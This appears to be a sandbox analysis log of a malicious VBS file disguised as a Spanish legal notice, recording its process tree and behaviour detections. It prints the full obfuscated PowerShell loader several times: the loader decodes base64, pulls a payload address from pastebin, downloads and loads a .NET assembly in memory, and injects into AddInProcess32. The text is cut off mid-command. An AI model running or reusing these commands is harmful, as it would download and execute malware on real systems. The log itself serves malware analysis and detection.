☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBh☆GM☆O☆☆y☆GU☆Mg☆5☆GU☆YQ☆w☆Dc☆Yw☆t☆GY☆Z☆☆0☆GE☆LQ☆z☆DQ☆Mw☆0☆C0☆YQ☆y☆GY☆Ng☆t☆D☆☆YQBk☆GQ☆N☆☆4☆DE☆Z☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆z☆DE☆M☆☆y☆D☆☆M☆☆w☆D☆☆M☆☆x☆DM☆OQ☆w☆DQ☆Mg☆w☆DI☆MQ☆w☆DE☆M☆☆z☆DI☆JQBB☆EQ☆TgBB☆E0☆RQBE☆F8☆RQBE☆F8☆TgBP☆Ek☆QwBB☆EM☆SQBG☆Ek☆V☆BP☆E4☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆GM☆bwBk☆C0☆ZQBy☆GI☆bQBl☆Gk☆dgBv☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B4☆Gs☆d☆Bw☆HU☆I☆☆s☆C☆☆JwB5☆HI☆a☆Bn☆G4☆Jw☆s☆C☆☆J☆B3☆G8☆d☆Bn☆HU☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wotgu = '0';$xktpu = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $btmdz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($btmdz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ac82e29ea07c-fd4a-3434-a2f6-0add481d=nekot&aidem=tla?txt.31020000013904202101032%ADNAMED_ED_NOICACIFITONcd/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $xktpu , 'yrhgn', $wotgu, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4152

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs"
1⤵
- Checks computer location settings
PID:2064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B3☆G8☆d☆Bn☆HU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hg☆awB0☆H☆☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆YgB0☆G0☆Z☆B6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆YgB0☆G0☆Z☆B6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBh☆GM☆O☆☆y☆GU☆Mg☆5☆GU☆YQ☆w☆Dc☆Yw☆t☆GY☆Z☆☆0☆GE☆LQ☆z☆DQ☆Mw☆0☆C0☆YQ☆y☆GY☆Ng☆t☆D☆☆YQBk☆GQ☆N☆☆4☆DE☆Z☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆z☆DE☆M☆☆y☆D☆☆M☆☆w☆D☆☆M☆☆x☆DM☆OQ☆w☆DQ☆Mg☆w☆DI☆MQ☆w☆DE☆M☆☆z☆DI☆JQBB☆EQ☆TgBB☆E0☆RQBE☆F8☆RQBE☆F8☆TgBP☆Ek☆QwBB☆EM☆SQBG☆Ek☆V☆BP☆E4☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆GM☆bwBk☆C0☆ZQBy☆GI☆bQBl☆Gk☆dgBv☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B4☆Gs☆d☆Bw☆HU☆I☆☆s☆C☆☆JwB5☆HI☆a☆Bn☆G4☆Jw☆s☆C☆☆J☆B3☆G8☆d☆Bn☆HU☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wotgu = '0';$xktpu = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $btmdz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($btmdz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ac82e29ea07c-fd4a-3434-a2f6-0add481d=nekot&aidem=tla?txt.31020000013904202101032%ADNAMED_ED_NOICACIFITONcd/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $xktpu , 'yrhgn', $wotgu, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:2492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs"
1⤵
- Checks computer location settings
PID:2064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B3☆G8☆d☆Bn☆HU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hg☆awB0☆H☆☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆YgB0☆G0☆Z☆B6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆YgB0☆G0☆Z☆B6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBh☆GM☆O☆☆y☆GU☆Mg☆5☆GU☆YQ☆w☆Dc☆Yw☆t☆GY☆Z☆☆0☆GE☆LQ☆z☆DQ☆Mw☆0☆C0☆YQ☆y☆GY☆Ng☆t☆D☆☆YQBk☆GQ☆N☆☆4☆DE☆Z☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆z☆DE☆M☆☆y☆D☆☆M☆☆w☆D☆☆M☆☆x☆DM☆OQ☆w☆DQ☆Mg☆w☆DI☆MQ☆w☆DE☆M☆☆z☆DI☆JQBB☆EQ☆TgBB☆E0☆RQBE☆F8☆RQBE☆F8☆TgBP☆Ek☆QwBB☆EM☆SQBG☆Ek☆V☆BP☆E4☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆GM☆bwBk☆C0☆ZQBy☆GI☆bQBl☆Gk☆dgBv☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B4☆Gs☆d☆Bw☆HU☆I☆☆s☆C☆☆JwB5☆HI☆a☆Bn☆G4☆Jw☆s☆C☆☆J☆B3☆G8☆d☆Bn☆HU☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wotgu = '0';$xktpu = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $btmdz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($btmdz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ac82e29ea07c-fd4a-3434-a2f6-0add481d=nekot&aidem=tla?txt.31020000013904202101032%ADNAMED_ED_NOICACIFITONcd/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $xktpu , 'yrhgn', $wotgu, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
PID:748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:2744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs"
1⤵
- Checks computer location settings
PID:4588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B3☆G8☆d☆Bn☆HU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hg☆awB0☆H☆☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆YgB0☆G0☆Z☆B6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆YgB0☆G0☆Z☆B6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBh☆GM☆O☆☆y☆GU☆Mg☆5☆GU☆YQ☆w☆Dc☆Yw☆t☆GY☆Z☆☆0☆GE☆LQ☆z☆DQ☆Mw☆0☆C0☆YQ☆y☆GY☆Ng☆t☆D☆☆YQBk☆GQ☆N☆☆4☆DE☆Z☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆z☆DE☆M☆☆y☆D☆☆M☆☆w☆D☆☆M☆☆x☆DM☆OQ☆w☆DQ☆Mg☆w☆DI☆MQ☆w☆DE☆M☆☆z☆DI☆JQBB☆EQ☆TgBB☆E0☆RQBE☆F8☆RQBE☆F8☆TgBP☆Ek☆QwBB☆EM☆SQBG☆Ek☆V☆BP☆E4☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆GM☆bwBk☆C0☆ZQBy☆GI☆bQBl☆Gk☆dgBv☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B4☆Gs☆d☆Bw☆HU☆I☆☆s☆C☆☆JwB5☆HI☆a☆Bn☆G4☆Jw☆s☆C☆☆J☆B3☆G8☆d☆Bn☆HU☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wotgu = '0';$xktpu = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $btmdz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($btmdz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ac82e29ea07c-fd4a-3434-a2f6-0add481d=nekot&aidem=tla?txt.31020000013904202101032%ADNAMED_ED_NOICACIFITONcd/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $xktpu , 'yrhgn', $wotgu, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:444

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4756

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs
2⤵
- Suspicious use of FindShellTrayWindow
PID:3952

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs"
1⤵
- Checks computer location settings
PID:444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B3☆G8☆d☆Bn☆HU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hg☆awB0☆H☆☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ